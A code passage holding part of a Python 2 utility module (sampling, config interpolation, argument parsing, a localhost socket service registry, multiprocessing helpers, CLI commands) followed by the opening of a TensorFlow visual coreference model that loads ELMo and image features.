print >> p, 'Sender: pydev.MailSender<%s>' % sender
print >> p, 'To: %s' % ','.join(map(lambda x:'%s'%(x), receiver.split(' ')))
print >> p, 'Subject: %s\n' % title
print >> p, cont
p.close()
class RandomItemGenerator:
'''
input a item stream and then output N random item.
'''
def __init__(self, N):
self.__random_num = N
self.__ol = []
self.__nth = 0
def feed(self, item):
if len(self.__ol)<self.__random_num:
self.__ol.append( item )
else:
x = random.randint(0, self.__nth)
if x < self.__random_num:
self.__ol[x] = item
self.__nth += 1
def result(self):
return self.__ol
# from zhangduo.
class TopkHeap(object):
def __init__(self, k, key_func):
self.k = k
self.key_func = key_func
self.data = []
self.counter = itertools.count() # unique sequence count
def get_data(self):
return [x[2] for x in self.data]
def sorted_data(self):
return [x[2] for x in reversed([heapq.heappop(self.data) for x in xrange(len(self.data))])]
def extend_heap(self, size):
self.k += size
def push(self, elem):
if len(self.data) < self.k:
count = next(self.counter)
heapq.heappush(self.data, [self.key_func(elem), count, elem])
return True
else:
small_key, _, _ = self.data[0]
elem_key = self.key_func(elem)
if elem_key > small_key:
count = next(self.counter)
heapq.heapreplace(self.data, [elem_key, count, elem])
return True
return False
def config_default_get(cp, section, option, default_value=None):
if cp.has_option(section, option):
return cp.get(section, option)
return default_value
def config_dict_get(cp, section, option, mapping_dict, default_key=None):
if cp.has_option(section, option):
key = cp.get(section, option)
if key not in mapping_dict:
raise Exception('configure [%s.%s] is set, but key(%s) not in dict [%s]' % (
section, option, key, ','.join(mapping_dict.keys()) ) )
return mapping_dict[key]
return mapping_dict[default_key]
def index_to_one_hot(data_in, dim):
'''
data_in : [a, b, c, d ... ]
data_out : [[0,...,1,...], [...], ...]
'''
import numpy as np
data_out = np.ndarray( (len(data_in), dim) )
data_out.fill(0)
for idx, v in enumerate(data_in):
data_out[idx][v] = 1.
return data_out
def zip_channel(im, channel_num):
# for plt.imshow()
# input: [ r, r, ..., g, g, .., b, b, ..]
# output: [ r, g, b, r, g, b, ..., r, g, b ]
import numpy as np
new_im = np.array(im)
if im.shape[0] % channel_num != 0:
raise Exception('Channel cannot be divided by shape [%d]'
% im.shape[0])
img_size = im.shape[0] / channel_num
for i in range(img_size):
for c in range(channel_num):
new_im[i * channel_num + c] = im[c*img_size + i]
return new_im
def show_image(data):
import matplotlib.pyplot as plt
import matplotlib.cm as cm
plt.axis('off')
plt.imshow(data)
plt.show()
def png_to_array(fd):
'''
transform a png file to np.array
need pypng, numpy.
'''
import png
import numpy
row, col, data, meta = png.Reader(fd).asRGB()
ans = numpy.array( list(data) )
ans = ans.reshape( (row, col, 3) )
return ans
def format_time(tm):
# format time by time.time()
# print format_time(time.time())
# output sample:
# 5h4, 5m2, 23s
if tm > 3600:
return '%dh%d' % (tm//3600, tm%3600/60)
elif tm > 60:
return '%dm%d' % (tm//60, tm%60)
else:
return '%ds' % (tm)
def err(l):
print >> sys.stderr, l
def log(l):
print >> sys.stderr, l
class VarConfig:
def __init__(self):
self.__config = {}
self.__config_context = {}
def read(self, filenames, var_opt=None, var_sec='var', conf_template='conf_template'):
'''
use var_opt(dict) and var_section to load default param.
which will subtitute %(param)s in config.
Step 1: load all raw conf.
generate [(section.option, raw_info)] tuple.
Step 2: if conf_template is set:
makeup each conf by it's template conf.
conf template relation must be DAG.
Step 3:
for section in DAG-order:
subtitute the params.
'''
raw_conf = ConfigParser.ConfigParser()
raw_conf.read(filenames)
# step 1. read row.
dependency = {}
section_list = list(raw_conf.sections())
if conf_template:
raw_conf = ConfigParser.ConfigParser()
raw_conf.read(filenames)
for section in raw_conf.sections():
if raw_conf.has_option(section, conf_template):
dependency[section] = raw_conf.get(section, conf_template, raw=True)
# generate DAG-order.
dag_section_list = []
for section in section_list:
temp = []
while 1:
if section in self.__config:
break
temp.insert(0, section)
self.__config[section] = {}
if section in dependency:
section = dependency[section]
else:
break
dag_section_list += temp
# step 2.
# makeup config by dependency.
for section in dag_section_list:
for opt in raw_conf.options(section):
value = raw_conf.get(section, opt, raw=True)
self.__config[section][opt] = value
self.__makeup_config(section, dependency.get(section, None))
# step 3.
# substitute params.
default_var = {}
if var_sec:
default_var = self.__config.get(var_sec, {})
for section in dag_section_list:
self.__config_context[section] = self.__overwrite_dict([default_var, self.__config[section], var_opt])
def get(self, sec, opt, default=None, raw=False, throw_exception=True):
if sec in self.__config:
if opt in self.__config[sec]:
if raw:
return self.__config[sec][opt]
return self.__interpolate(
self.__config[sec][opt],
self.__config_context[sec],
throw_exception=throw_exception)
return default
def has_section(self, sec):
return sec in self.__config
def has_option(self, sec, opt):
if sec in self.__config:
if opt in self.__config[sec]:
return True
return False
def items(self, section, raw=False, throw_exception=True):
for key, value in self.__config.get(section, {}).iteritems():
if raw:
yield key, value
else:
yield key, self.__interpolate(value, self.__config_context[section], throw_exception)
def options(self, section):
return self.__config.get(section, {}).keys()
def sections(self):
return self.__config.keys()
def clear(self):
self.__config = {}
def __overwrite_dict(self, dict_list):
ret = {}
for d in dict_list:
if isinstance(d, dict):
for key, value in d.iteritems():
ret[key] = value
return ret
def __makeup_config(self, son, father):
if father is None:
return
for key in self.__config[father].keys():
if key not in self.__config[son]:
self.__config[son][key] = self.__config[father][key]
def __interpolate(self, rawval, vars, throw_exception=True):
''' code from ConfigParser()
'''
# do the string interpolation
value = rawval
depth = self.MAX_INTERPOLATION_DEPTH
while depth: # Loop through this until it's done
depth -= 1
if value and "%(" in value:
value = self._KEYCRE.sub(self._interpolation_replace, value)
try:
value = value % vars
except KeyError, e:
if throw_exception:
raise Exception(('InterpolationMissingOptionError v=[%s]\n'
'\tbad value=%s\n'
'\tvals=%s\n')
% (value, e, vars))
else:
break
if value and "%(" in value:
if throw_exception:
raise Exception('InterpolationDepthErro')
else:
logging.error('VarConf: interpolation: [%s] failed.', rawval)
return value
MAX_INTERPOLATION_DEPTH = 32
_KEYCRE = re.compile(r"%\(([^)]*)\)s|.")
def _interpolation_replace(self, match):
s = match.group(1)
if s is None:
return match.group()
else:
return "%%(%s)s" % s.lower()
class Arg(object):
'''
Sample code:
ag=pydev.Arg()
ag.str_opt('f', 'file', 'this arg is for file')
opt = ag.init_arg()
# todo with opt, such as opt.file
'''
def __init__(self, help='Lazy guy, no help'):
self.is_parsed = False;
help = help.decode('utf-8').encode('gb18030')
self.__parser = argparse.ArgumentParser(description=help)
self.__args = None;
# -l --log
self.str_opt('log', 'l', 'logging level default=[error]', meta='[debug|info|error]');
def __default_tip(self, default_value=None):
if default_value==None:
return ''
return ' default=[%s]'%default_value
def bool_opt(self, name, iname, help=''):
help = help.decode('utf-8').encode('gb18030')
self.__parser.add_argument(
'-'+iname,
'--'+name,
action='store_const',
const=1,
default=0,
help=help);
return
def str_opt(self, name, iname, help='', default=None, meta=None):
help = (help + self.__default_tip(default)).decode('utf-8').encode('gb18030')
self.__parser.add_argument(
'-'+iname,
'--'+name,
metavar=meta,
help=help,
default=default);
pass
def var_opt(self, name, meta='', help='', default=None):
help = (help + self.__default_tip(default).decode('utf-8').encode('gb18030'))
if meta=='':
meta=name
self.__parser.add_argument(name,
metavar=meta,
help=help,
default=default)
pass
def init_arg(self, input_args=None):
if not self.is_parsed:
if input_args is not None:
self.__args = self.__parser.parse_args(input_args)
else:
self.__args = self.__parser.parse_args()
self.is_parsed = True;
if self.__args.log:
format='%(asctime)s %(levelname)8s [%(filename)18s:%(lineno)04d]: %(message)s'
if self.__args.log=='debug':
logging.basicConfig(level=logging.DEBUG, format=format)
logging.debug('log level set to [%s]'%(self.__args.log));
elif self.__args.log=='info':
logging.basicConfig(level=logging.INFO, format=format)
logging.info('log level set to [%s]'%(self.__args.log));
elif self.__args.log=='error':
logging.basicConfig(level=logging.ERROR, format=format)
logging.info('log level set to [%s]'%(self.__args.log));
else:
logging.error('log mode invalid! [%s]'%self.__args.log)
return self.__args
@property
def args(self):
if not self.is_parsed:
self.__args = self.__parser.parse_args()
self.is_parsed = True;
return self.__args;
def function_curve(min_x, min_y, interval, function):
import numpy as np
import matplotlib.pyplot as plt
x = np.arange(min_x, min_y, interval)
y = map(lambda x:function(x), x)
line, = plt.plot(x, y)
plt.show()
def foreach_line(fd=sys.stdin, percentage=False):
if percentage:
cur_pos = fd.tell()
fd.seek(0, 2)
file_size = fd.tell()
fd.seek(cur_pos)
old_perc = 0
while 1:
line = fd.readline()
if line == '':
break
if percentage:
cur_pos = fd.tell()
perc = int(100.0 * cur_pos / file_size)
if perc>old_perc:
old_perc = perc
print >> sys.stderr, '%c[foreach_line] process %d%% (%d/%d)' % (
13, perc, cur_pos, file_size)
yield line.strip('\n')
def foreach_row(fd=sys.stdin, min_fields_num=-1, seperator='\t', percentage=False):
if percentage:
cur_pos = fd.tell()
fd.seek(0, 2)
file_size = fd.tell()
fd.seek(cur_pos)
old_perc = 0
while 1:
line = fd.readline()
if line == '':
break
if percentage:
cur_pos = fd.tell()
perc = int(100.0 * cur_pos / file_size)
if perc>old_perc:
old_perc = perc
print >> sys.stderr, '%c[foreach_line] process %d%% (%d/%d)' % (
13, perc, cur_pos, file_size)
arr = line.strip('\n').split(seperator)
if min_fields_num>0 and len(arr)<min_fields_num:
continue
yield arr
def dict_from_str(s, l1_sep=';', l2_sep='='):
dct = {}
if not isinstance(s, str):
return {}
for item in s.split(l1_sep):
r = item.split(l2_sep)
if len(r)!=2:
logging.error('[dict_from_str]: [%s] is not a valid item.')
continue
dct[r[0]] = r[1]
return dct
def dict_from_file(fd=sys.stdin, process=None, key_process=None, seperator='\t'):
dct = {}
for row in foreach_row(fd, seperator=seperator):
if key_process:
key = key_process(row)
else:
key = row[0]
if process:
value = process(row)
else:
value = '\t'.join(row[1:])
dct[key] = value
return dct
def echo(input_text):
return ('ACK: ' + input_text)
def sock_recv(sock):
d = sock.recv(HEADER_LENGTH)
if len(d)==0:
return None
data_len = int(d)
#print data_len
data = ''
while 1:
n = min(4096, data_len)
d = sock.recv(n)
if not d:
break
data_len -= len(d)
data += d
#print 'left=%d cur=%d' % (data_len, len(data))
if data_len<=0:
break
return data
def sock_send(sock, data):
data_len = '%8d' % len(data)
sock.sendall(data_len)
sock.sendall(data)
def simple_query(query, ip='127.0.0.1', port=12345):
sys.stderr.write('SEEK_TO: %s:%s\n' % (ip, port))
clisock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clisock.connect((ip, port))
sock_send(clisock, query)
ret = sock_recv(clisock)
clisock.close()
return ret
def detect(ip='127.0.0.1', port=12345):
try:
ret = simple_query(DETECTIVE_MSG, ip, port)
if ret != 'YES':
return False
except Exception, msg:
sys.stderr.write('detect err: %s\n' % msg)
return False
return True
def simple_query_by_name(query, name, ip='127.0.0.1'):
cmd = 'SEEK\t%s' % name
ret = simple_query(cmd, ip, port=8769)
arr = ret.split('\t')
if arr[0] != 'OK':
sys.stderr.write('seek name failed! [%s]' % ret)
return None
port = int(arr[1])
return simple_query(query, ip, port)
class BasicService:
def __init__(self):
self.__handler_init = None
self.__handler_process = None
self.__handler_timer_process = None
self.__timer = 0.0
def set_init(self, h_init):
self.__handler_init = h_init
def set_process(self, h_process):
self.__handler_process = h_process
def set_timer_deamon(self, h_process, seconds=60.0):
'''
set a process which will be called each time interval.
'''
self.__handler_timer_process = h_process
self.__timer = seconds
def run_with_name(self, name, desc='No description.', ip='127.0.0.1', port=12345):
cmd = 'REGEDIT\t%s\t%d\t%s' % (name, port, desc)
ret = simple_query(cmd, ip, port=8769)
arr = ret.split('\t')
if arr[0] != 'OK':
sys.stderr.write('SET NAME FAILED! [%s]' % ret)
return
self.run(ip, port)
def run(self, ip='127.0.0.1', port=12345):
if self.__handler_init:
sys.stderr.write('init..\n')
self.__handler_init()
self.__sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.__sock.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
self.__sock.bind( (ip, port) )
self.__sock.listen(32)
sys.stderr.write('listen : %s:%d\n' % (ip, port))
last_time = time.time()
try:
while 1:
# check time at first.
if self.__handler_timer_process:
dt = time.time() - last_time
if dt >= self.__timer:
try:
self.__handler_timer_process()
except Exception, msg:
sys.stderr.write('error in time_handler: %s\n' % msg)
last_time = time.time()
# set a timer for accept:
# because i need to run a timer process.
self.__sock.settimeout(1);
try:
clisock, (remote_host, remote_port) = self.__sock.accept()
except socket.timeout, msg:
continue
try:
data = sock_recv(clisock)
if data == DETECTIVE_MSG:
sock_send(clisock, 'YES')
else:
sys.stderr.write('[%s:%s] connected dl=%d\n' % (remote_host, remote_port, len(data)))
if self.__handler_process:
response = self.__handler_process(data)
if response:
sock_send(clisock, response)
except Exception, msg:
sys.stderr.write('err [%s]!\n' % msg)
traceback.print_stack()
traceback.print_exc()
continue
finally:
clisock.close()
finally:
sys.stderr.write('byebye.\n')
self.__sock.close()
class ManagerService:
def __init__(self):
self.__name_dct = {}
self.__desc_dct = {}
self.__recover()
self.__svr = BasicService()
self.__svr.set_process(self.process)
self.__svr.set_timer_deamon(self.deamon_process, 5)
def run(self):
self.__svr.run(port=8769)
def deamon_process(self):
'''
check whether each service is alive.
'''
sys.stderr.write('detect: %s\n' % time.asctime())
del_names = []
for name, port in self.__name_dct.iteritems():
alive = detect(port=port)
if not alive:
sys.stderr.write('%s : %s[%d] is dead.\n' % (time.asctime(), name, port))
del_names.append(name)
for name in del_names:
del self.__name_dct[name]
del self.__desc_dct[name]
self.__backup()
def process(self, cmd):
'''
3 type(s) of cmd:
'SEEK[\t][name]' => 'OK\tPORT' or 'ERR\tNOT_FOUND'
'REGEDIT[\t][name][\t][port][\t][desc]' => 'OK' or 'ERR\tmsg'
'INFO' => 'OK\tname info.'
'''
cmd = cmd.replace('\n', '')
cmd = cmd.replace('###', '')
cmd = cmd.replace('||', '')
arr = cmd.split('\t')
if arr[0] == 'SEEK':
if len(arr)!=2:
return 'ERR\tpara_num=%d' % len(arr)
name = arr[1]
if name not in self.__name_dct:
return 'ERR\tNOT_FOUND'
return 'OK\t%d' % self.__name_dct[name]
elif arr[0] == 'REGEDIT':
if len(arr)!=4:
return 'ERR\tpara_num=%d' % len(arr)
name, port, desc = arr[1:4]
if ':' in name:
return 'ERR\tINVALID_NAME_NO_:_'
port = int(port)
self.__name_dct[name] = port
self.__desc_dct[name] = desc
return 'OK'
elif arr[0] == 'INFO':
info = ''
for name, port in self.__name_dct.iteritems():
desc = self.__desc_dct.get(name, '')
info += '%s||%s||%s###' % (name, port, desc)
return 'OK\t%s' % info
def __recover(self):
try:
f = file('service_info.txt')
except:
sys.stderr.write('no backup info.\n')
return
for l in f.readlines():
arr = l.strip('\n').split('\t')
if len(arr)!=3:
continue
name, port, desc = arr
port = int(port)
if name not in self.__name_dct:
self.__name_dct[name] = port
self.__desc_dct[name] = desc
def __backup(self):
f = file('service_info.txt', 'w')
for name, port in self.__name_dct.iteritems():
desc = ''
if name in self.__desc_dct:
desc = self.__desc_dct[name]
f.write('%s\t%d\t%s\n' % (name, port, name))
f.close()
class CounterObject:
def __init__(self):
self.__keyvalue = dict()
self.__keyvalue['__tag__'] = []
def tag(self, t):
self.__keyvalue['__tag__'].append(t)
def kv(self, key, value):
if key not in self.__keyvalue:
self.__keyvalue[key] = []
self.__keyvalue[key].append(value)
def __str__(self):
return json.dumps(self.__keyvalue)
def loads(self, s):
self.__keyvalue = json.loads(s)
class MapperCounter:
def __init__(self):
self.__dct = {}
def inc(self, key, inc=1):
if key not in self.__dct:
self.__dct[key] = 0
self.__dct[key] += inc
def dump(self, stream, sort=False):
if sort:
for key, value in sorted(self.__dct.iteritems(), key=lambda x:-x[1]):
print '%s\t%s' % (key, value)
else:
for key, value in self.__dct.iteritems():
print '%s\t%s' % (key, value)
def __test_basic_service():
# test a svr.
svr = BasicService()
svr.set_process(echo)
svr.run_with_name('ECHO', desc='This is a echo service.')
class MPProcessor:
def __init__(self, functor, proc_num, stdout_dir='mp_out'):
self.functor = functor
self.proc_num = proc_num
self.processes = [];
self.stdout_dir=stdout_dir;
self.stdout_fn = [];
for i in range(proc_num-1):
self.processes.append(Process(target=self._inner_func, args=(i, )));
out_fn = './%s/part-%05d'%(self.stdout_dir, i)
self.stdout_fn.append(out_fn);
out_fn = './%s/part-%05d'%(self.stdout_dir, self.proc_num)
self.stdout_fn.append(out_fn);
return
def _inner_func(self, cur_i):
old_stdout = sys.stdout;
out_fn = self.stdout_fn[cur_i];
logging.info('Process[%d] reset stdout to %s'%(cur_i, out_fn));
sys.stdout = open( out_fn, 'w' )
logging.info('Process[%d] begin to process.'%cur_i);
self.functor(cur_i, self.proc_num);
sys.stdout = old_stdout;
logging.info('Process[%d] processes over.'%cur_i);
def process_all(self):
''' START => JOIN.
'''
for process in self.processes:
process.start();
# 自己也跑一个。
self._inner_func(self.proc_num-1);
for process in self.processes:
process.join();
class Timer:
def __init__(self):
self.clear()
def begin(self):
self.__begin_time = time.time()
def end(self):
self.__end_time = time.time()
self.__total_time += self.cost_time()
self.__counter += 1
def cost_time(self):
return self.__end_time - self.__begin_time
def total_time(self):
return self.__total_time
def qps(self):
qps = self.__counter / self.__total_time
return qps
def clear(self):
self.__begin_time = None
self.__end_time = None
self.__counter = 0
self.__total_time = 0
def log(self, stream=sys.stderr, name=None, output_qps=False):
qps_info = ''
if output_qps:
qps_info = 'QPS=%.3f' % (self.qps())
if name:
print >> stream, '[Timer][%s]: %.3f(s) %s' % (name, self.cost_time(), qps_info)
else:
print >> stream, '[Timer]: %.3f(s) %s' % (self.cost_time(), qps_info)
class MTItemProcessor(MPProcessor):
def __init__(self,
proc_set, functor, proc_num, stdout_dir):
MPProcessor.__init__(self, functor, proc_num, stdout_dir);
self.proc_set = proc_set
self.inner_func = functor
self.functor = self._shell_functor
return ;
def _shell_functor(self, cur_i, proc_num):
print >> sys.stderr, 'Process: %d' % cur_i
for it in self.proc_set:
if it % self.proc_num == cur_i:
# hit this processor.
try:
self.inner_func(it);
except Exception, e:
print >> sys.stderr, e
def merge_stdout(self):
logging.info('MTP: merge stdout');
line_cnt = 0;
for fn in self.stdout_fn:
fl = open(fn, 'r');
line = fl.readline();
while line:
line=line.rstrip('\n');
print line;
line_cnt += 1;
line = fl.readline()
fl.close();
logging.info('MTP: merge over! %d lines written.'%line_cnt);
##############################################################################
# Part II: CMD definition.
# How to add a CMD:
# def CMD_xx:
# ''' doc.
# '''
# # your code.
#
# xx will be command name.
# doc will be the help doc as cmd.
#
##############################################################################
def CMD_random(argv):
'''Generate random lines from stdin.
Params:
random [random_num]
'''
random_num = 10
if len(argv)>0:
random_num = int(argv[1])
print >> sys.stderr, 'Random_num = %d' % random_num
rd = RandomItemGenerator(random_num)
for line in foreach_line():
rd.feed(line)
for item in rd.result():
print item
def CMD_mgrservice(argv):
'''Run the basic_service manager.
'''
s = ManagerService()
s.run()
def CMD_show(argv):
'''Show all the commands.
'''
l = sys.modules['__main__'].__dict__.keys()
for key in l:
if key.find('CMD_') == 0:
print ' %s: ' % key.replace('CMD_', '')
f = eval(key)
if f.__doc__ is None:
print ' [NO_DOC]'
print
else:
print ' %s' % (f.__doc__.replace('\n', '\n '))
def CMD_counter(argv):
'''Run counter job.
-i : output int.
--mapper : run as mapper mode.
-c [int] : cut threshold.
'''
output_int = False
arg_set = set(argv)
cut_num = 0
mapper_mode = False
if '-i' in arg_set:
# output as integer.
output_int = True
if '--mapper' in arg_set:
mapper_mode = True
for arg in arg_set:
if arg.find('-c') == 0:
cut_num = int(arg[2:])
if mapper_mode:
ct = MapperCounter()
while 1:
line = sys.stdin.readline()
if line == '':
break
ct.inc(line.strip('\n'))
ct.dump(sys.stdout)
else:
# reducer.
last_key = None
acc_value = 0
while 1:
line = sys.stdin.readline()
if line == '':
break
arr = line.strip('\n').split('\t')
if len(arr)!=2:
continue
key, value = arr
if output_int:
value = int(value)
else:
value = float(value)
if key != last_key:
if last_key:
if acc_value >= cut_num:
print '%s\t%s' % (last_key, acc_value)
last_key = key
acc_value = 0
acc_value += value
if last_key:
if acc_value >= cut_num:
print '%s\t%s' % (last_key, acc_value)
def CMD_test_conf(argv):
cp = VarConfig()
cp.read(argv, throw_exception=False)
for sec in cp.sections():
print '[%s]' % sec
options = cp.options(sec)
for k in options:
try:
v = cp.get(sec, k)
print '%s.%s=%s' % (sec, k, v)
except:
print '%s.%s [error]' % (sec, k)
continue
print
def CMD_xfind(argv):
'''
xfind: do set-operation in files.
load dict from file(B), read data from stdin(A), make set-operation(find, A_B)
xfind -f filename [-h] [-o <opeartion>] [-a --field_A] [-b --field_B] [-s --seperator <'\\t'>]
'''
a = Arg('load dict from file(B), read data from stdin(A), make set-operation(find, A_B)')
a.str_opt('filename', 'f', 'input key file as [B]')
a.str_opt('operation', 'o', 'operations, support find(A in B), A_B(A minus B)', default='find')
a.str_opt('field_A', 'a', 'which row of A(input stream) will be treated as key, start at 1', default='1')
a.str_opt('field_B', 'b', 'which row of B(key_file) will be treated as key, start at 1', default='1')
a.str_opt('seperator', 's', 'seperator, default is tab.', default='\t')
opt = a.init_arg(argv)
field_B = int(opt.field_B) - 1
field_A = int(opt.field_A) - 1
keydict = dict_from_file(file(opt.filename), process=lambda x:'\t'.join(x), key_process=lambda x:x[field_B], seperator=opt.seperator)
logging.info('Dict loaded. size=%d' % len(keydict))
for row in foreach_row(sys.stdin, seperator=opt.seperator):
if len(row)<=field_A:
continue
if opt.operation == 'find':
if row[field_A] in keydict:
print opt.seperator.join(row)
elif opt.operation == 'A_B':
if row[field_A] not in keydict:
print opt.seperator.join(row)
def CMD_sendmail(argv):
'''
send a file as mail to somebody.
sendmail <receiver> <filename> <title>
'''
if len(argv)!=3:
print 'sendmail <receiver> <filename> <title>'
return
receiver, filename, title = argv
s = MailSender()
content = ''.join(file(filename).readlines())
s.send(receiver, title, content)
def CMD_dimdiff(argv):
'''
dimdiff: compare the diff between two DimInfo file.
dimdiff <filename1> <filename2>
'''
a = DimInfo()
a.read(file(argv[0]))
b = DimInfo()
b.read(file(argv[1]))
b.compare(a)
def CMD_dimshow(argv):
'''
dimshow: show dim info of file.
dimshow <filename>
'''
a = DimInfo()
a.read(file(argv[0]))
a.debug(sys.stderr)
if __name__=='__main__':
logging.basicConfig(level=logging.INFO)
'''
pydev.py <command>
command-list:
list:
list all the availble command.
'''
if len(sys.argv)<=1:
print (
'''Usage:
pydev.py <command>
you can use 'pydev.py show' to get all available command.
''')
sys.exit(-1)
com = eval('CMD_' + sys.argv[1])
ret = com(sys.argv[2:])
sys.exit(ret)
|
model.py | from __future__ import absolute_import
from __future__ import division
import os
import math
import json
import threading
import numpy as np
import tensorflow as tf
import tensorflow_hub as hub
import h5py
import random
import util
import coref_ops
import metrics
class VisCoref(object):
def __init__(self, config):
self.config = config
self.context_embeddings = util.EmbeddingDictionary(config["context_embeddings"])
self.head_embeddings = util.EmbeddingDictionary(config["head_embeddings"], maybe_cache=self.context_embeddings)
self.char_embedding_size = config["char_embedding_size"]
self.char_dict = util.load_char_dict(config["char_vocab_path"])
self.max_span_width = config["max_span_width"]
self.lm_layers = self.config["lm_layers"]
self.lm_size = self.config["lm_size"]
self.use_im = self.config["use_im"]
im_obj_labels = [json.loads(line) for line in open(self.config["im_obj_label_path"], "r")]
self.id2cat = {int(d["doc_key"]):d["sentences"][0] for d in im_obj_labels}
if self.use_im:
self.lm_obj_file = h5py.File(self.config["lm_obj_path"], "r")
self.im_emb_size = self.config["im_emb_size"]
# visual baseline
self.use_im_fc = self.config["use_im_fc"]
if self.use_im_fc:
self.im_fc_file = h5py.File(self.config["im_fc_feat_path"], "r")
self.im_fc_feat_size = self.config["im_fc_feat_size"]
self.im_fc_emb_size = self.config["im_fc_emb_size"]
self.vis_weight = self.config["vis_weight"]
self.num_cdd_pool = self.config["num_cdd_pool"]
self.lm_cdd_file = h5py.File(self.config["lm_cdd_path"], "r")
with open(self.config["cdd_path"]) as f:
self.cdd_nps = [json.loads(jsonline) for jsonline in f.readlines()]
self.eval_data = None # Load eval data lazily.
self.lm_file = h5py.File(self.config["lm_path"], "r")
print(f'Loading elmo cache from {self.config["lm_path"]}')
input_props = []
input_props.append((tf.string, [None, None])) # Tokens.
input_props.append((tf.float32, [None, None, self.context_embeddings.size])) # Context embeddings.
input_props.append((tf.float32, [None, None, self.head_embeddings.size])) # Head embeddings.
input_props.append((tf.float32, [None, None, self.lm_size, self.lm_layers])) # LM embeddings for cap.
input_props.append((tf.float32, [None, None, self.lm_size, self.lm_layers])) # LM embeddings for dial.
input_props.append((tf.int32, [None, None, None])) # Character indices.
input_props.append((tf.int32, [None])) # Text lengths.
input_props.append((tf.int32, [None])) # Speaker IDs.
input_props.append((tf.bool, [])) # Is training.
input_props.append((tf.int32, [None])) # Gold starts.
input_props.append((tf.int32, [None])) # Gold ends.
input_props.append((tf.int32, [None])) # Cluster ids.
input_props.append((tf.int32, [None])) # caption candidate starts.
input_props.append((tf.int32, [None])) # caption candidate ends.
input_props.append((tf.int32, [None])) # Text lengths cdd.
input_props.append((tf.float32, [None, None, self.context_embeddings.size])) # Context embeddings cdd.
input_props.append((tf.float32, [None, None, self.head_embeddings.size])) # Head embeddings cdd.
input_props.append((tf.int32, [None, None, None])) # Character indices cdd.
input_props.append((tf.float32, [None, None, self.lm_size, self.lm_layers])) # LM embeddings for cdd.
input_props.append((tf.string, [None, None])) # Tokens cdd.
input_props.append((tf.int32, [None])) # Text lengths obj.
input_props.append((tf.float32, [None, None, self.context_embeddings.size])) # Context embeddings obj.
input_props.append((tf.float32, [None, None, self.head_embeddings.size])) # Head embeddings obj.
input_props.append((tf.int32, [None, None, None])) # Character indices obj.
input_props.append((tf.float32, [None, None, self.lm_size, self.lm_layers])) # LM embeddings for obj.
input_props.append((tf.string, [None, None])) # Tokens obj.
input_props.append((tf.bool, [])) # Has object.
input_props.append((tf.float32, [self.im_fc_feat_size])) # Image features.
self.queue_input_tensors = [tf.placeholder(dtype, shape) for dtype, shape in input_props]
dtypes, shapes = zip(*input_props)
queue = tf.PaddingFIFOQueue(capacity=10, dtypes=dtypes, shapes=shapes)
self.enqueue_op = queue.enqueue(self.queue_input_tensors)
self.input_tensors = queue.dequeue()
self.predictions, self.loss = self.get_predictions_and_loss(*self.input_tensors)
self.global_step = tf.Variable(0, name="global_step", trainable=False)
self.reset_global_step = tf.assign(self.global_step, 0)
self.max_eval_f1 = tf.Variable(0.0, name="max_eval_f1", trainable=False)
learning_rate = tf.train.exponential_decay(self.config["learning_rate"], self.global_step,
self.config["decay_frequency"], self.config["decay_rate"], staircase=True)
trainable_params = tf.trainable_variables()
gradients = tf.gradients(self.loss, trainable_params)
gradients, _ = tf.clip_by_global_norm(gradients, self.config["max_gradient_norm"])
optimizers = {
"adam" : tf.train.AdamOptimizer,
"sgd" : tf.train.GradientDescentOptimizer
}
optimizer = optimizers[self.config["optimizer"]](learning_rate)
self.train_op = optimizer.apply_gradients(zip(gradients, trainable_params), global_step=self.global_step)
def start_enqueue_thread(self, session):
with open(self.config["train_path"]) as f:
train_examples = [json.loads(jsonline) for jsonline in f.readlines()]
def _enqueue_loop():
while True:
global_step = session.run(self.global_step)
random.seed(self.config["random_seed"] + global_step)
random.shuffle(train_examples)
for example in train_examples:
tensorized_example = self.tensorize_example(example, is_training=True)
feed_dict = dict(zip(self.queue_input_tensors, tensorized_example))
session.run(self.enqueue_op, feed_dict=feed_dict)
enqueue_thread = threading.Thread(target=_enqueue_loop)
enqueue_thread.daemon = True
enqueue_thread.start()
def restore(self, session, step='max'):
# Don't try to restore unused variables from the TF-Hub ELMo module.
vars_to_restore = [v for v in tf.global_variables() if "module/" not in v.name]
saver = tf.train.Saver(vars_to_restore)
if step == 'max':
path = "model.max.ckpt"
else:
path = "model-" + step
checkpoint_path = os.path.join(self.config["log_dir"], path)
print(f"Restoring from {checkpoint_path}")
session.run(tf.global_variables_initializer())
saver.restore(session, checkpoint_path)
def load_lm_embeddings(self, doc_key):
if self.lm_file is None:
return np.zeros([0, 0, self.lm_size, self.lm_layers])
file_key = doc_key.replace("/", ":")
group_cap = self.lm_file[file_key + ':cap']
num_candidates = len(list(group_cap.keys()))
candidates = [group_cap[str(i)][...] for i in range(num_candidates)]
if len(candidates) > 0:
lm_emb_cap = np.zeros([len(candidates), max(c.shape[0] for c in candidates), self.lm_size, self.lm_layers])
for i, c in enumerate(candidates):
lm_emb_cap[i, :c.shape[0], :, :] = c
else:
# to avoid empty lm_emb_cap
lm_emb_cap = np.zeros([1, 1, self.lm_size, self.lm_layers])
group = self.lm_file[file_key]
num_sentences = len(list(group.keys()))
sentences = [group[str(i)][...] for i in range(1, num_sentences + 1)]
lm_emb_dial = np.zeros([len(sentences), max(s.shape[0] for s in sentences), self.lm_size, self.lm_layers])
for i, s in enumerate(sentences):
lm_emb_dial[i, :s.shape[0], :, :] = s
return [lm_emb_cap, lm_emb_dial]
def load_lm_embeddings_cdd(self, examples):
candidates = [self.lm_cdd_file[e['doc_key']]['0'][...] for e in examples]
lm_emb_cdd = np.zeros([len(candidates), max(c.shape[0] for c in candidates), self.lm_size, self.lm_layers])
for i, c in enumerate(candidates):
lm_emb_cdd[i, :c.shape[0], :, :] = c
return lm_emb_cdd
def load_lm_embeddings_obj(self, objs):
objs = [self.lm_obj_file[str(obj)]['0'][...] for obj in objs]
lm_emb_objs = np.zeros([len(objs), max(c.shape[0] for c in objs), self.lm_size, self.lm_layers])
for i, c in enumerate(objs):
lm_emb_objs[i, :c.shape[0], :, :] = c
return lm_emb_objs
def load_im_feat(self, doc_key):
if self.im_fc_file is None:
return np.zeros(self.im_fc_feat_size)
file_key = doc_key.replace("/", ":")
im_feat = self.im_fc_file[file_key][:]
return im_feat
def tensorize_mentions(self, mentions):
if len(mentions) > 0:
starts, ends = zip(*mentions)
else:
starts, ends = [], []
return np.array(starts), np.array(ends)
